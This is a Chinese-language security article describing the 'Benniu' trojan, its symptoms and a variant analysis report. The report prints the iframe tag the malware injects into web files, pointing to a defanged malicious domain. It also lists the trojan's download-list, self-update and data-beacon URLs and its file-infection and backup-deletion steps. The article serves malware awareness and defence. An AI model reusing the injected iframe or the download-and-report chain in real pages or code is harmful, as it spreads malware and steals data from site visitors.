“犇牛”症状非常容易判断
犇牛是年初以来传播手段最综合的木马,传播手段与当年的“磁碟机”木马和“熊猫烧香”病毒类似,能把木马种子插入电脑中的所有html网页文件和rar压缩文件,具备了“全盘感染”的能力。
中了“犇牛”后,症状非常容易判断,特征有二:
1.电脑特别慢;
2.非系统盘下每个文件夹目录都多出来一个不正常的dll文件,经常会跳出“虚拟内存不足”的提示。用户重装系统或者用ghost系统还原都不能解决,除非全盘格式化。这是由于犇牛劫持了.dll文件,并删除了.gho镜像文件所致。
犇牛会在中招的电脑上划分势力范围,不让其它木马下载势力染指,这个不多见,由此可见木马行业内部竞争也日趋激烈。犇牛下载的木马很多都出自知名盗号工作室(五家以上),主要是网游盗号木马。
现在犇牛的制作团队正在跟安全厂商进行一场正面对抗。目前绝大部分杀毒软件都杀不干净或被强行关闭、卸载,这一点各安全厂商论坛上都有用户的求助信息。下面就给出犇牛变种的分析报告。
犇牛变种分析报告
1、遍历全盘中的Gho、GHO、gho文件,找到就删除。
2、遍历全盘中的 jsp、php、aspx、asp、htm、html文件,找到就向文件尾部插入
<iframe src=hxxp://derek.kalengzi.cn/a.htm width=100 height=0></iframe>
进行网马传播。
3、通过 hxxp://down.skydows.cn/down.txt 这个下载列表,下载大量木马。
4、直接下载hxxp://w.ssddffgg.cn/me.exe,拷贝为c:\__default.pif,运行并进行自我更新。
5、向hxxp://w.ssddffgg.cn/7/get.asp发送本机信息,用来统计中招用户信息。
6、释放感染木马到c:\windows\ini目录下,并写入desktop.ini用来伪装成回收站。达到隐藏文件的目的。
网友评论